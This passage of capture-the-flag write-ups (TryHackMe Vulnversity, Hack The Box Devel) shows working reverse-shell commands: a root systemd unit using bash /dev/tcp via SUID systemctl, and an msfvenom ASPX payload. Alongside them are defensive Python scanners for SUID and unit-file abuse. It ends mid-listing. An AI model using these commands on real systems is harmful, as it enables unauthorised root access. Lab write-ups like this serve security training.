
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    global $daemon;  // without this the function sees an undefined local and always prints
    if (!$daemon) {
        print "$string\n";
    }
}

?>

We then need to set up a netcat listener on the attacking (Kali) box (ensure your port matches the port in the exploit) to receive the reverse shell.

> nc -lvnp 1234

To execute the exploit we need to visit the link where the file was uploaded to (this link was given as part of Task 4).

http://<ip>:3333/internal/uploads/pe.phtml

Your netcat listener should now resemble the below output.

> nc -lvvnp 1234
listening on [any] 1234 ...
connect to [IP-ON-THM-NETWORK] from (UNKNOWN) [10.10.206.160] 53402
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 04:33:53 up  1:30,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
>

As suggested, the route to root is via a SUID file; the following command lists all SUID files on the target system.

> find / -perm -4000 2>/dev/null

/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

The major security risk here is /bin/systemctl being SUID: it lets an unprivileged user enable and start a unit file of their choosing, and the User= directive in that unit decides which account runs the ExecStart command.

We first need to ensure we are in a directory which the current user can write to, /tmp is great for our purposes. Below is the service file we need to get onto the target machine.

[Unit]
Description=root

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/IP-ON-THM-NETWORK/9999 0>&1"

[Install]
WantedBy=multi-user.target

To save transferring this file, it is just as easy to use printf to create the file we require directly on the target.

> printf '[Unit]\nDescription=root\n\n[Service]\nType=simple\nUser=root\nExecStart=/bin/bash -c "bash -i >& /dev/tcp/IP-ON-THM-NETWORK/9999 0>&1"\n\n[Install]\nWantedBy=multi-user.target\n' > root.service

NOTE: ensure you change the port and IP address.

The service file will now be at /tmp/root.service.

We now need to enable and start the service, however, before we do that let's start another netcat listener on the port defined above.

(attacking machine)
> nc -lvnp 9999
(target machine)
> systemctl enable /tmp/root.service
> systemctl start root

Once this service has started we should see our netcat listener displaying a root shell - WELL DONE, you have now completed the box; feel free to grab the root.txt flag from /root/root.txt.
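As an added example (my own code, not the writeup's or TryHackMe's), the script below shows the two checks a defender would run against this escalation path: comparing find / -perm -4000 output against a baseline of expected SUID binaries so that an entry such as /bin/systemctl stands out, and scanning a unit file for the combination used above (a service that runs as root with an ExecStart that opens a /dev/tcp connection or an interactive shell) plus an untrusted on-disk location such as /tmp. The baseline is a constructed subset of the listing above, not a distribution's official list, and the pattern watch-list, trusted directory list and function names are mine.

```python
import configparser
import re
from typing import List, Set

# Constructed baseline: a subset of the SUID binaries from the find output above.
# In practice, record this from a known-good host; it is not an official list.
BASELINE_SUID: Set[str] = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/pkexec",
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/sbin/mount.cifs",
}

# Constructed sample: the same subset as 'find / -perm -4000' would print it,
# plus the one entry that should not be there.
FIND_OUTPUT = """\
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/bin/su
/bin/mount
/bin/umount
/bin/ping
/bin/systemctl
/sbin/mount.cifs
"""


def unexpected_suid(find_output: str, baseline: Set[str]) -> List[str]:
    """Paths that are SUID on the live host but absent from the baseline."""
    live = {l.strip() for l in find_output.splitlines() if l.strip().startswith("/")}
    return sorted(live - baseline)


# Hypothetical watch-list of ExecStart fragments typical of a shell over the network.
SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/"),             # bash network redirection
    re.compile(r"\bbash\s+-i\b"),         # interactive bash
    re.compile(r"\b(nc|ncat|netcat)\b"),  # netcat family
]

# Unit files are expected to live in the packaged or admin-managed directories.
TRUSTED_UNIT_DIRS = ("/etc/systemd/system/", "/lib/systemd/system/",
                     "/usr/lib/systemd/system/")


def scan_unit(unit_text: str, unit_path: str) -> List[str]:
    """Findings for one unit file: a reverse-shell-looking ExecStart and an
    untrusted on-disk location. Returns an empty list for a clean unit."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str  # systemd keys are case-sensitive
    cp.read_string(unit_text)
    findings: List[str] = []
    if cp.has_section("Service"):
        user = cp["Service"].get("User", "root")  # system units default to root
        exec_start = cp["Service"].get("ExecStart", "")
        for pat in SHELL_PATTERNS:
            if pat.search(exec_start):
                findings.append(f"ExecStart matches {pat.pattern!r} and runs as {user}")
    if not unit_path.startswith(TRUSTED_UNIT_DIRS):
        findings.append(f"unit loaded from untrusted location {unit_path}")
    return findings


# Constructed sample: the root.service from this section.
ROOT_SERVICE = """\
[Unit]
Description=root

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/IP-ON-THM-NETWORK/9999 0>&1"

[Install]
WantedBy=multi-user.target
"""

# Constructed sample of an ordinary packaged unit for comparison.
BENIGN_SERVICE = """\
[Service]
ExecStart=/usr/sbin/sshd -D
User=root
"""

if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(FIND_OUTPUT, BASELINE_SUID))
    for finding in scan_unit(ROOT_SERVICE, "/tmp/root.service"):
        print("root.service:", finding)
```

The SUID diff is the cheap, high-signal check: systemctl is not SUID on a stock install, so it shows up immediately against any baseline recorded from a clean host. The unit scan complements it by catching the artefact the technique leaves behind (a unit enabled from /tmp whose ExecStart is a shell), which is also what you would look for in the journal after the fact.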


Reference Links

@klockw3rk's Medium Blog

GTFOBins

High On Coffee reverse shell cheat sheet

Hack The Box - Devel

Box Details

Devel

OS DIFFICULTY POINTS
Windows EASY 20

ENUMERATION

Initial Port Scanning

masscan

COMMAND


masscan -p1-65535,U:1-65535 10.10.10.5 --rate=1000 -e tun0 -oG masscan-Blue

RESULT


# Masscan 1.0.5 scan initiated Tue Sep 10 14:08:54 2019
# Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.5 ()     Ports: 80/open/tcp////
Host: 10.10.10.5 ()     Ports: 21/open/tcp////
# Masscan done at Tue Sep 10 14:12:36 2019

nmap

Ports for nmap scanning:

  • 80
  • 21

COMMAND


nmap -sC -sV -p80,21 -oA nmap-Devel 10.10.10.5

RESULT

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-10 15:13 BST
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds

Discovery

FTP

COMMAND


ftp 10.10.10.5

RESULT

Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp> 

EXPLOITS

Exploit Search

COMMAND

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=8515 -f aspx > revshell.aspx

NOTE: As we are going to use netcat to listen for the reverse shell we must use the payload windows/shell_reverse_tcp and not windows/shell/reverse_tcp, i.e. the stageless version.

RESULT


#  nc -lvvp 8515
listening on [any] 8515 ...
10.10.10.5: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.5] 49166
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

POST EXPLOIT DISCOVERY

System Information


c:\windows\system32\inetsrv>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 
System Boot Time:          13/9/2019, 5:50:51 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 804 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.542 MB
Virtual Memory: In Use:    505 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5


Hostname

c:\windows\system32\inetsrv>hostname
hostname
devel

Users

c:\windows\system32\inetsrv>echo %username%
echo %username%
DEVEL$

c:\windows\system32\inetsrv>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babis                    Guest                    
The command completed with one or more errors.

Network Information


c:\windows\system32\inetsrv>ipconfig /all

ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : devel
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-C8-4B
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.10.5(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
   DNS Servers . . . . . . . . . . . : 10.10.10.2
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{024DBC4C-1BA9-4DFC-8341-2C35AB1DF869}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
c:\windows\system32\inetsrv>route print
route print
===========================================================================
Interface List
 11...00 50 56 b9 c8 4b ......Intel(R) PRO/1000 MT Network Connection
  1...........................Software Loopback Interface 1
 12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
 13...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0       10.10.10.2       10.10.10.5    266
       10.10.10.0    255.255.255.0         On-link        10.10.10.5    266
       10.10.10.5  255.255.255.255         On-link        10.10.10.5    266
     10.10.10.255  255.255.255.255         On-link        10.10.10.5    266
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link        10.10.10.5    266
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link        10.10.10.5    266
===========================================================================
Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
          0.0.0.0          0.0.0.0       10.10.10.2  Default
===========================================================================

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    306 ::1/128                  On-link
  1    306 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None

c:\windows\system32\inetsrv>arp -A
arp -A

Interface: 10.10.10.5 --- 0xb
  Internet Address      Physical Address      Type
  10.10.10.2            00-50-56-b9-c8-cd     dynamic
  10.10.10.255          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static

c:\windows\system32\inetsrv>netstat -ano
netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1424
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       384
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       724
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       888
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       488
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       496
  TCP    10.10.10.5:139         0.0.0.0:0              LISTENING       4
  TCP    10.10.10.5:49166       10.10.14.10:8515       ESTABLISHED     3228
  TCP    [::]:21                [::]:0                 LISTENING       1424
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       672
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5357              [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       384
  TCP    [::]:49153             [::]:0                 LISTENING       724
  TCP    [::]:49154             [::]:0                 LISTENING       888
  TCP    [::]:49155             [::]:0                 LISTENING       488
  TCP    [::]:49156             [::]:0                 LISTENING       496
  UDP    0.0.0.0:123            *:*                                    1000
  UDP    0.0.0.0:3702           *:*                                    1392
  UDP    0.0.0.0:3702           *:*                                    1392
  UDP    0.0.0.0:5355           *:*                                    1072
  UDP    0.0.0.0:52626          *:*                                    1392
  UDP    10.10.10.5:137         *:*                                    4
  UDP    10.10.10.5:138         *:*                                    4
  UDP    [::]:123               *:*                                    1000
  UDP    [::]:3702              *:*                                    1392
  UDP    [::]:3702              *:*                                    1392
  UDP    [::]:52627             *:*                                    1392
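
The `netstat -ano` listing above is long enough that reading it by eye is error-prone, and on a real engagement (or during incident response on a host like this one) the questions are always the same: which PID owns each listening port, and which established sessions go to a peer that has no business talking to this machine. The following is an added example, not part of the original writeup: a small Python parser for Windows `netstat -ano` output. The sample lines are copied from the listing above and trimmed to a few rows; the "trusted network" `10.10.10.0/24` is an assumption used to decide which peers count as foreign.

```python
"""Parse Windows `netstat -ano` output into structured records.

Added example for this writeup, not code from the original post. The sample
below is a trimmed copy of the netstat listing shown above (constructed input).
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1424
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.10.10.5:139         0.0.0.0:0              LISTENING       4
  TCP    10.10.10.5:49166       10.10.14.10:8515       ESTABLISHED     3228
  TCP    [::]:21                [::]:0                 LISTENING       1424
  UDP    0.0.0.0:123            *:*                                    1000
  UDP    10.10.10.5:137         *:*                                    4
"""


@dataclass
class Socket:
    proto: str
    local_host: str
    local_port: int
    remote_host: Optional[str]
    remote_port: Optional[int]
    state: Optional[str]  # UDP rows carry no State column
    pid: int


def split_endpoint(endpoint: str) -> Tuple[Optional[str], Optional[int]]:
    """Split 'host:port' (IPv4, bracketed IPv6, or the UDP wildcard '*:*')."""
    if endpoint == "*:*":
        return None, None
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def parse_netstat(text: str) -> List[Socket]:
    """Turn the raw listing into Socket records, skipping headers and blanks."""
    sockets: List[Socket] = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("TCP", "UDP"):
            continue
        proto, local, remote = fields[0], fields[1], fields[2]
        if proto == "TCP":
            state, pid = fields[3], int(fields[4])
        else:
            state, pid = None, int(fields[3])  # UDP: no state, PID is 4th field
        local_host, local_port = split_endpoint(local)
        remote_host, remote_port = split_endpoint(remote)
        sockets.append(Socket(proto, local_host, local_port,
                              remote_host, remote_port, state, pid))
    return sockets


def listening_ports(sockets: List[Socket]) -> Dict[Tuple[str, int], int]:
    """Map (proto, port) -> owning PID for every listening socket.

    UDP sockets are treated as listening; IPv4 and IPv6 binds of the same
    port collapse onto one key since they belong to the same process.
    """
    owners: Dict[Tuple[str, int], int] = {}
    for s in sockets:
        if s.proto == "UDP" or s.state == "LISTENING":
            owners[(s.proto, s.local_port)] = s.pid
    return owners


def foreign_established(sockets: List[Socket], trusted_nets: List[str]) -> List[Socket]:
    """Established TCP sessions whose peer lies outside the trusted networks.

    On a pentest this is the tester's own shell; in incident response it is
    the fastest way to spot an interactive session that should not exist.
    """
    nets = [ipaddress.ip_network(n) for n in trusted_nets]  # assumed trust list
    flagged = []
    for s in sockets:
        if s.state != "ESTABLISHED":
            continue
        peer = ipaddress.ip_address(s.remote_host)
        if not any(peer in net for net in nets):
            flagged.append(s)
    return flagged


if __name__ == "__main__":
    socks = parse_netstat(SAMPLE_NETSTAT)
    for (proto, port), pid in sorted(listening_ports(socks).items()):
        print(f"{proto} {port:<6} owned by PID {pid}")
    for s in foreign_established(socks, ["10.10.10.0/24"]):
        print(f"FOREIGN SESSION: PID {s.pid} -> {s.remote_host}:{s.remote_port}")
```

Run against the full listing, the one row the second function returns is the `ESTABLISHED` session from PID 3228 to `10.10.14.10:8515`, i.e. the shell used in this writeup; everything else is a local listener. Pairing the PID column with `tasklist /svc` output is the natural next step when you need to know which service owns port 80 or 445 (PID 4 is the System process here).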

c:\windows\system32\inetsrv>netsh firewall show state
netsh firewall show state

Firewall status:
-------------------------------------------------------------------
Profile                           = Standard
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable
Group policy version              = Windows Firewall
Remote admin mode                 = Disable

Ports currently open on all network interfaces:
Port   Protocol  Version  Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .



c:\windows\system32\inetsrv> netsh firewall show config
 netsh firewall show config

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Allowed programs configuration for Domain profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Domain profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Service configuration for Standard profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          Network Discovery

Allowed programs configuration for Standard profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Standard profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Standard profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Log configuration:
-------------------------------------------------------------------
File location   = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size   = 4096 KB
Dropped packets = Disable
Connections     = Disable

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Investigate Running Services

c:\windows\system32\inetsrv>schtasks /query /fo LIST /v
schtasks /query /fo LIST /v

Folder: \
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           3:00:00
Start Date:                           9/11/2006
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual)
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job provides a credential prompt if authentication to the template distribution web service on the server fails.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Autochk
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Autochk\Proxy
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:21:07
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
Start In:                             N/A
Comment:                              This task collects and uploads autochk SQM data if opted-in to the Microsoft Customer Experience Improvement Program.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 525600 minutes
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Customer Experience Improvement Program
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\Consolidator
Next Run Time:                        14/9/2019 8:00:00
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 2:00:00
Last Result:                          -2147479295
Author:                               Microsoft Corporation
Task To Run:                          %SystemRoot%\System32\wsqmcons.exe
Start In:                             N/A
Comment:                              If the user has consented to participate in the Windows Customer Experience Improvement Program, this job collects and sends usage data to Microsoft.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           2/1/2004
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        19 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask
Next Run Time:                        19/9/2019 3:30:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The Kernel CEIP (Customer Experience Improvement Program) task collects additional information about the system and sends this data to Microsoft.  If the user has not consented to participate in Windows CEIP, this task does nothing.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 3 minutes, If Not Idle Retry For 1020 minutes
Power Management:                     No Start On Batteries
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           3:30:00
Start Date:                           1/9/2008
End Date:                             N/A
Days:                                 THU
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip
Next Run Time:                        16/9/2019 1:30:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The USB CEIP (Customer Experience Improvement Program) task collects Universal Serial Bus related statistics and information about your machine and sends it to the Windows Device Connectivity engineering group at Microsoft.  The information received is
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           1:30:00
Start Date:                           25/4/2008
End Date:                             N/A
Days:                                 Every 3 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Defrag
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Next Run Time:                        18/9/2019 1:38:42
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\defrag.exe -c
